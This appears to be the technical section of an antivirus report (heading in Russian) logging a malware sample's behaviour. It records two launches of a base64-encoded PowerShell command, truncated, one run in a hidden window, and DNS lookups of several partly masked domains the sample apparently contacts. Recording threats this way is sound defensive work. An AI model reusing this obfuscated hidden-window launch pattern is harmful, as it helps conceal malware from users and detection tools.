Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGkAZABzAF8AXwBPAHUAdABkAG8AbwByAHMAawBwAGgAPQAnAHYAYQBsAHUAZQBhAGQAZABlAGQAYwBpAGEAJwA7ACQAdQB...
- DNS ASK ha#####endayquotess.com
- DNS ASK jo###orchs.com
- DNS ASK ph######trainernearme.com
- DNS ASK ye####gianguyen.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGkAZABzAF8AXwBPAHUAdABkAG8AbwByAHMAawBwAGgAPQAnAHYAYQBsAHUAZQBhAGQAZABlAGQAYwBpAGEAJwA7ACQAdQB...' (со скрытым окном)